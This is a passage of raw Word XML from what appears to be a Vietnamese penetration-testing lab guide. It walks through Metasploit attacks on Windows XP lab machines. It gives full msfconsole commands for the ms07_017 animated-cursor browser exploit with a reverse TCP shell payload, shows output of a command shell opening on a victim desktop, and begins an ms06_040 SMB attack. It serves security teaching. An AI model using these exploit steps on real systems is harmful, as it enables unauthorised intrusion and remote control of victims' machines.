          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224EC1A5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4267A52B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D382E60" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57E4DB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TARGET</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F36014" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9B3C9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc65834500"/>
      <w:bookmarkStart w:id="31" w:name="_Toc1826872232"/>
      <w:bookmarkStart w:id="32" w:name="_Toc145594635"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Tấn công Windows XP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>: ms07_017_ani_loadimage_chunksize</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="1732FBAA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Máy Kali linux có Địa chỉ IP 192.168.1.10 (LHOST) sẽ tấn công máy Win XP có Địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.110, 192.168.1.111, 192.168.1.112</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RHOST) dựa trên lổ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>loadimage_chunksize</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED73D7" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Passive exploits wait for incoming hosts and exploit them as they connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581B2BB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB28F8B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>They can also be used in conjunction with email exploits, waiting for connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3998A5" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1C0EB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc20454843"/>
      <w:bookmarkStart w:id="34" w:name="_Toc20808955"/>
      <w:bookmarkStart w:id="35" w:name="_Toc1867665558"/>
      <w:bookmarkStart w:id="36" w:name="_Toc145594636"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="3072BC15" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA63AC2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029091B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F2879" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D097BA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31599862" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537AAF6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A68485" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3636C466" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>use exploit/windows/browser/ms07_017_ani_loadimage_chunksize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E194DFA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set URIPATH /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD15040" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08009EC4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD76DD1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set LPORT 44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CAFA2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770AC958" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB1998" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3771DA53" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Exploit running as background job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1709B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED9A49A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Started reverse handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C8DED" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Using URL: http://0.0.0.0:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D78D0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*]  Local IP: http://192.168.1.5:8080/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880BADA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Server started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8CF743" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>msf6 exploit(ani_loadimage_chunksize) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6BCC6" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Attempting to exploit ani_loadimage_chunksize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB4E673" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Sending HTML page to 192.168.1.10:1077...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F9A08C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Attempting to exploit ani_loadimage_chunksize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490DB5F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.10:1077...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CB469" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Sending stage (240 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2055F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Command shell session 2 opened (192.168.1.5:4444 -&gt; 192.168.1.10:1078)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F4F6A4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A69EFD" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>msf6 exploit(ani_loadimage_chunksize) &gt; sessions -i 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E063B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Starting interaction with 2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB1F9BA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C60474" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>Microsoft Windows XP [Version 5.1.2600]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A58C3D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>(C) Copyright 1985-2001 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201DF8C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9BA1B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>C:\Documents and Settings\victim\Desktop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9552C8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="0041641A" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r>
        <w:t>Next, we will look at how to actually use exploits in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495AC9A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc20808983"/>
      <w:bookmarkStart w:id="38" w:name="_Toc65834514"/>
      <w:bookmarkStart w:id="39" w:name="_Toc1863458357"/>
      <w:bookmarkStart w:id="40" w:name="_Toc145594638"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Tham khảo thêm một số kịch bản tấn công trên WinXP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="5D0B8A27" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/smb/ms06_040_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFDDD3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ADB175" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DAC1F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.120</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5340FA33" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 &gt; search ms06_040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB67AA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
